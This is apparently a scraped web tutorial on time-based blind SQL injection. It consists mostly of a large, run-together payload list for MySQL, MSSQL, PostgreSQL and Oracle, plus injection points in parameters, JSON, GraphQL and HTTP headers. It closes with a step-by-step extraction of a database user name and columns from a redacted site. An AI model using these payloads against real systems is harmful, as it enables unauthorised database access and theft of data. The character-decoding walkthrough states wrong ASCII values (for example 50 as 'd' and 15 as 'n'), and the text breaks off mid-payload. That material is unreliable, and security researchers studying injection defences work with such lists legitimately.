Today’s topic is all about Blind SQL injection detection and exploitation.
Time Based (GET,POST,PUT)
Apply on:
Search, first name, last name, number, any kind of date, email or password (register, login, reset password), any kind of product, menu, keyword, payment, Cookie, User-Agent, Referer, X-Forwarded-For
Parameter list (regular):
Payload list:
MySQL Blind (Time Based):
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Zif(now()=sysdate(),sleep(5),0)'XOR(if(now()=sysdate(),sleep(5),0))XOR''XOR(if(now()=sysdate(),sleep(5*1),0))OR'0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z0'or(now()=sysdate()&&SLEEP(1))or'Zif(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/if(1=1,sleep(5),0)/*'XOR(if(1=1,sleep(5),0))OR'"XOR(if(1=1,sleep(5),0))OR"*/if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(5),0))OR"*/SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/%2c(select%5*%5from%5(select(sleep(5)))a)(select(0)from(select(sleep(5)))v)(SELECT SLEEP(5))'%2b(select*from(select(sleep(5)))a)%2b'(select*from(select(sleep(5)))a)1'%2b(select*from(select(sleep(5)))a)%2b',(select * from (select(sleep(5)))a)desc%2c(select*from(select(sleep(5)))a)-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))(SELECT * FROM (SELECT(SLEEP(5)))YYYY)(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--'+(select*from(select(sleep(5)))a)+'(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/',''),/*test*/%26%26%09sLeEp(5)%09--+AND BLIND:1 and sleep 5--1 and sleep 51 and sleep(5)--1 and sleep(5)' and sleep 5--' and sleep 5' and sleep 5 and '1'='1' and sleep(5) and '1'='1' and sleep(5)--' and sleep(5)' AnD SLEEP(5) ANd '1and sleep 5--and sleep 5and sleep(5)--and sleep(5)and SELECT SLEEP(5); #AnD SLEEP(5)AnD SLEEP(5)--AnD SLEEP(5)# and sleep 5-- and sleep 5 
and sleep(5)-- and sleep(5) and SELECT SLEEP(5); #' AND SLEEP(5)#" AND SLEEP(5)#') AND SLEEP(5)#OR BLINDr sleep 5--or sleep 5or sleep(5)--or sleep(5)or SELECT SLEEP(5); #or SLEEP(5)or SLEEP(5)#or SLEEP(5)--or SLEEP(5)="or SLEEP(5)=' or sleep 5-- or sleep 5 or sleep(5)-- or sleep(5) or SELECT SLEEP(5); #' OR SLEEP(5)#" OR SLEEP(5)#') OR SLEEP(5)#You can replace AND / OR1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=13371 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('PBiy'='PBiy) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337=1337))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=13371 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 13371 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337'='1337'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337'='1337' AND (SELECT 
3122 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337') AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337' LIKE '1337'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337' LIKE '1337%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337%'='1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337' LIKE '1337") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337"="1337")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337"="1337"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337"="1337" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337"="1337") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337" LIKE "1337")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337" LIKE "1337"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337" LIKE "1337" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337" LIKE "1337' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337RLIKE BLIND:You can replace AND / ORRLIKE SLEEP(5)--' RLIKE SLEEP(5)--' RLIKE SLEEP(5)-- 1337" RLIKE SLEEP(5)-- 1337') RLIKE SLEEP(5)-- 1337') RLIKE SLEEP(5) AND ('1337'='1337')) RLIKE SLEEP(5) AND (('1337'='1337'))) RLIKE SLEEP(5) AND ((('1337'='1337) RLIKE SLEEP(5)-- 1337) RLIKE SLEEP(5) AND (1337=1337)) RLIKE SLEEP(5) AND ((1337=1337))) RLIKE SLEEP(5) AND (((1337=13371 RLIKE SLEEP(5)1 RLIKE SLEEP(5)-- 13371 RLIKE SLEEP(5)# 1337) WHERE 1337=1337 RLIKE SLEEP(5)-- 13371 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337`) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337' RLIKE SLEEP(5) AND '1337'='1337') RLIKE SLEEP(5) AND ('1337' LIKE '1337')) RLIKE SLEEP(5) AND (('1337' 
LIKE '1337'))) RLIKE SLEEP(5) AND ((('1337' LIKE '1337%' RLIKE SLEEP(5) AND '1337%'='1337' RLIKE SLEEP(5) AND '1337' LIKE '1337") RLIKE SLEEP(5) AND ("1337"="1337")) RLIKE SLEEP(5) AND (("1337"="1337"))) RLIKE SLEEP(5) AND ((("1337"="1337" RLIKE SLEEP(5) AND "1337"="1337") RLIKE SLEEP(5) AND ("1337" LIKE "1337")) RLIKE SLEEP(5) AND (("1337" LIKE "1337"))) RLIKE SLEEP(5) AND ((("1337" LIKE "1337" RLIKE SLEEP(5) AND "1337" LIKE "1337' RLIKE SLEEP(5) OR '1337'='1337') WHERE 1337=1337 RLIKE SLEEP(5)-- 1337") WHERE 1337=1337 RLIKE SLEEP(5)-- 1337' WHERE 1337=1337 RLIKE SLEEP(5)-- 1337" WHERE 1337=1337 RLIKE SLEEP(5)-- 1337ELT Blind:You can replace AND / OR' AND ELT(1337=1337,SLEEP(5))--' AND ELT(1337=1337,SLEEP(5))-- 1337" AND ELT(1337=1337,SLEEP(5))-- 1337') AND ELT(1337=1337,SLEEP(5))-- 1337') AND ELT(1337=1337,SLEEP(5)) AND ('1337'='1337')) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='1337' AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337') AND ELT(1337=1337,SLEEP(5)) AND ('1337' LIKE '1337')) AND ELT(1337=1337,SLEEP(5)) AND (('1337' LIKE '1337'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE '1337) AND ELT(1337=1337,SLEEP(5))-- 1337) AND ELT(1337=1337,SLEEP(5)) AND (1337=1337)) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=13371 AND ELT(1337=1337,SLEEP(5))1 AND ELT(1337=1337,SLEEP(5))-- 13371 AND ELT(1337=1337,SLEEP(5))# 1337) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 13371 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 13371`=`1` AND ELT(1337=1337,SLEEP(5)) AND `1`=`1]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1%' AND ELT(1337=1337,SLEEP(5)) AND '1337%'='1337' AND 
ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337") AND ELT(1337=1337,SLEEP(5)) AND ("1337"="1337")) AND ELT(1337=1337,SLEEP(5)) AND (("1337"="1337"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337"="1337" AND ELT(1337=1337,SLEEP(5)) AND "1337"="1337") AND ELT(1337=1337,SLEEP(5)) AND ("1337" LIKE "1337")) AND ELT(1337=1337,SLEEP(5)) AND (("1337" LIKE "1337"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337" LIKE "1337" AND ELT(1337=1337,SLEEP(5)) AND "1337" LIKE "1337' AND ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337'||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||''||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||''+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+'||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337BENCHMARK:You can replace AND / OR' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337') AND =BENCHMARK(5000000,MD5(0x774c5341))--') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337')) 
AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337
Microsoft SQL Server Blind (Time Based):
;waitfor delay '0:0:5'--';WAITFOR DELAY '0:0:5'--);waitfor delay '0:0:5'--';waitfor delay '0:0:5'--";waitfor delay '0:0:5'--');waitfor delay '0:0:5'--");waitfor delay '0:0:5'--));waitfor delay '0:0:5'--'));waitfor delay '0:0:5'--"));waitfor delay '0:0:5'--") IF (1=1) WAITFOR DELAY '0:0:5'--';%5waitfor%5delay%5'0:0:5'%5--%5' WAITFOR DELAY '0:0:5'--' WAITFOR DELAY '0:0:5'or WAITFOR DELAY '0:0:5'--or WAITFOR DELAY '0:0:5'and WAITFOR DELAY '0:0:5'--and WAITFOR DELAY '0:0:5'WAITFOR DELAY '0:0:5';WAITFOR DELAY '0:0:5'--;WAITFOR DELAY '0:0:5'1 WAITFOR DELAY '0:0:5'--1 WAITFOR DELAY '0:0:5'1 WAITFOR DELAY '0:0:5'-- 13371' WAITFOR DELAY '0:0:5' AND '1337'='13371') WAITFOR DELAY '0:0:5' AND ('1337'='13371) WAITFOR DELAY '0:0:5' AND (1337=1337') WAITFOR DELAY '0:0:5'--" WAITFOR DELAY '0:0:5'--')) WAITFOR DELAY '0:0:5'--'))) WAITFOR DELAY '0:0:5'--%' WAITFOR DELAY '0:0:5'--") WAITFOR DELAY '0:0:5'--")) WAITFOR DELAY '0:0:5'--"))) WAITFOR DELAY '0:0:5'--
Postgresql Blind (Time Based):
";SELECT pg_sleep(5);;SELECT pg_sleep(5);and SELECT pg_sleep(5);1 SELECT pg_sleep(5);or SELECT pg_sleep(5);(SELECT pg_sleep(5))pg_sleep(5)--1 or pg_sleep(5)--" or pg_sleep(5)--' or pg_sleep(5)--1) or pg_sleep(5)--") or pg_sleep(5)--') or pg_sleep(5)--1)) or pg_sleep(5)--")) or pg_sleep(5)--')) or pg_sleep(5)--pg_SLEEP(5)pg_SLEEP(5)--pg_SLEEP(5)#or pg_SLEEP(5)or pg_SLEEP(5)--or pg_SLEEP(5)#' SELECT pg_sleep(5);or SELECT pg_sleep(5);' SELECT pg_sleep(5);1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))-- 13371' AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND '1337'='13371') AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND ('1337'='13371) AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (1337=1337
Oracle Blind (Time Based):
You can replace AND / OR
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)-- 1337' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND '1337'='1337') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND ('1337'='1337) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337=1337
Generic Time Based SQL Injection Payloads:
sleep(5)#(sleep 5)--(sleep 5)(sleep(5))--(sleep(5))-sleep(5)SLEEP(5)#SLEEP(5)--SLEEP(5)="SLEEP(5)='";sleep 5--";sleep 5";sleep(5)--";sleep(5)";SELECT SLEEP(5); #1 SELECT SLEEP(5); #+ SLEEP(5) + '&&SLEEP(5)&&SLEEP(5)--&&SLEEP(5)#;sleep 5--;sleep 5;sleep(5)--;sleep(5);SELECT SLEEP(5); #'&&SLEEP(5)&&'1' SELECT SLEEP(5); #benchmark(50000000,MD5(1))benchmark(50000000,MD5(1))--benchmark(50000000,MD5(1))#or benchmark(50000000,MD5(1))or benchmark(50000000,MD5(1))--or benchmark(50000000,MD5(1))#ORDER BY SLEEP(5)ORDER BY SLEEP(5)--ORDER BY SLEEP(5)#AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337RANDOMBLOB(500000000/2)AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))RANDOMBLOB(1000000000/2)AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
If the response is delayed by about 5 to 7 seconds, the parameter is vulnerable. Measure the normal response time first, since network latency or server load can also delay a response.
Detection and exploitation:
1.=payload
Example:
=0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z=(select(0)from(select(sleep(5)))v)email=test@gmail.com' WAITFOR DELAY '0:0:5'--email=test@gmail.com'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
2.=value payload
Example:
=1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND '%'='=1'XOR(if(now()=sysdate(),sleep(5),0))OR'=1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337 =1 or sleep(5)#
MySQL blind SQL injection (time based):
email=test@gmail.com'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
[IMG]https://miro.medium.com/v2/resize:fit:700/1*D9i4iyfJ62mnQeOtPfsAWg.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*EwylY6hqMBpTJXRq8BLgTA.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:392/1*UWGw-50xZC3wRYg_dklGPA.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*S4Bb8Nleps-hoSUdu9w5oA.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*PCaJrmljJDXWdIqU3GA9FQ.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*urhLRTDBPrpdukkcaelt2Q.jpeg[/IMG]
MSSQL blind SQL injection (time based):
email=test@gmail.com' WAITFOR DELAY '0:0:5'--
[IMG]https://miro.medium.com/v2/resize:fit:700/1*CdNLKLDfXfpECqwOr6Ecfg.png[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*cErDfVAS9BHyLBOIOzav2Q.png[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*XinsHBIpDcqZ6xj6HC1-Bg.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*-S9Is3nbZTUkri6wR588kQ.jpeg[/IMG]
[IMG]https://miro.medium.com/v2/resize:fit:700/1*JRRt82kcpPa1vXP8zMdpGw.jpeg[/IMG]
3. https://redact.com/page/payload or https://redact.com/page/value payload
Example:
You must be logged in to see this link."XOR(if(now()=sysdate(),sleep(3),0))OR"/https://redact.com/(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"You must be logged in to see this link. AnD SLEEP(5)You must be logged in to see this link.' ORDER BY SLEEP(5)
[IMG]https://miro.medium.com/v2/resize:fit:700/1*MX6EySiEHrusRBDdBk2NMA.jpeg[/IMG]
4. Blind SQL injection in JSON:
{payload}
[payload]
{value payload}
Example:
[-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))]{AnD SLEEP(5)}{1 AnD SLEEP(5)}{1' AnD SLEEP(5)--}{sleep 5}"emails":["AnD SLEEP(5)"]"emails":["test@gmail.com' OR SLEEP(5)#"]{"options":{"id":[],"emails":["AnD SLEEP(5)"],
5. Blind SQL injection in GraphQL:
{"operationName":"pages","variables":{"offset":0,"limit":10,"sortc":"name Payload","sortrev":false},"query":"query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n"}
Example:
{"operationName":"pages","variables":{"offset":0,"limit":10,"sortc":"name AND sleep(5)","sortrev":false},"query":"query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n"}
6. HTTP header based (error based, time based):
Referer: https://redact.com/408685756payload
Cookie: _gcl_au=1.1.2127391584.1587087463payload
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87Payload
or
Referer: https://redact.com/408685756 payload
Cookie: _gcl_au=1.1.2127391584.1587087463 payload
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Payload
X-Forwarded-For: payload
MySQL error based:
[IMG]https://miro.medium.com/v2/resize:fit:700/1*u9-N09vB98GeqnEuLqPQCQ.jpeg[/IMG]
Mysql Error Based
MSSQL error based:
[IMG]https://miro.medium.com/v2/resize:fit:700/1*QkLcrAGYZARVxDv_jBArYg.jpeg[/IMG]
Mssql Error Based
7. Blind SQL injection exploitation (manual):
MySql Time Based:RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).SELECT * FROM products WHERE id=1-SLEEP(5)RESULTING QUERY (WITH MALICIOUS BENCHMARK INJECTED).SELECT * FROM products WHERE id=1-BENCHMARK(100000000, rand())RESULTING QUERY - TIME-BASED ATTACK TO VERIFY DATABASE VERSION.SELECT * FROM products WHERE id=1-IF(MID(VERSION(),1,1) = '5', SLEEP(5), 0)Time Based Sqli:1 and (select sleep(5) from users where SUBSTR(table_name,1,1) = 'A')#Error Blind SQLi:AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -Ultimate Sql injection Payload:SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"Exploitation:redact.com/page/search?q=1 and sleep(5)--Current user:redact.com/page/search?q=1 and if(substring(user(),1,1)='a',SLEEP(5),1)--redact.com/page/search?q=1 and if(substring(user(),2,1)='a',SLEEP(5),1)--redact.com/page/search?q=1 and if(substring(user(),3,1)='a',SLEEP(5),1)--Table_name guessing:redact.com/page/search?q=1 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)redact.com/page/search?q=1 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)redact.com/page/search?q=1 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--Mssql Time Based:RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).SELECT * FROM products WHERE id=1; WAIT FOR DELAY '00:00:5'RESULTING QUERY (VERIFY IF USER IS SA).SELECT * FROM products WHERE id=1; IF SYSTEM_USER='sa' WAIT FOR DELAY '00:00:5'Exploitation:You must be logged in to see this link. WAITFOR DELAY '00:00:5'-- (+5 seconds)TIME-BASED Extraction of CURRENT DATABASE USERDetermine Length of USER:You must be logged in to see this link. 
IF (LEN(USER)=1) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (LEN(USER)=4) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (LEN(USER)=5) WAITFOR DELAY '00:00:5'-- (+5 seconds)Result = 5 characters in lengthDetermine length, and then try to find out CHAR value one character position at a time, like this:You must be logged in to see this link. IF (ASCII(lower(substring((USER),1,1)))>96) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),1,1)))>50) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>98) WAITFOR DELAY '00:00:5'--http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1))=97) WAITFOR DELAY '00:00:5'-- (+5 seconds)Result = the first character CHAR value is 97 which is an "a"You must be logged in to see this link. IF (ASCII(lower(substring((USER),2,1)))>99) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),2,1)))=50) WAITFOR DELAY '00:00:5'-- (+5 seconds)Result = the second character CHAR value is 50 which is a "d"You must be logged in to see this link. IF (ASCII(lower(substring((USER),3,1)))>58) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),3,1)))=59) WAITFOR DELAY '00:00:5'—Result = third character CHAR value is 59 which is the letter "m"You must be logged in to see this link. IF (ASCII(lower(substring((USER),4,1)))>54) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),4,1)))=55) WAITFOR DELAY '00:00:5'-- (+5 seconds)Result = the fourth character CHAR value is 55 which is an "i"You must be logged in to see this link. 
IF (ASCII(lower(substring((USER),5,1)))>59) WAITFOR DELAY '00:00:5'-- (+5 seconds)You must be logged in to see this link. IF (ASCII(lower(substring((USER),5,1)))=15) WAITFOR DELAY '00:00:5'-- (+5 seconds)the fifth character position has CHAR value of 15 which is the letter "n"Database User = 97,50,59,55,15 = adminTIME-BASED Extraction of 1st TABLE COLUMNS:let’s enumerate some columns from the table(s) we found:You must be logged in to see this link. IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members')=4) WAITFOR DELAY '00:00:5'-- (+5 seconds)You can check the length before you start testing awayhttp://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=117) WAITFOR DELAY '00:00:5'-- (+5 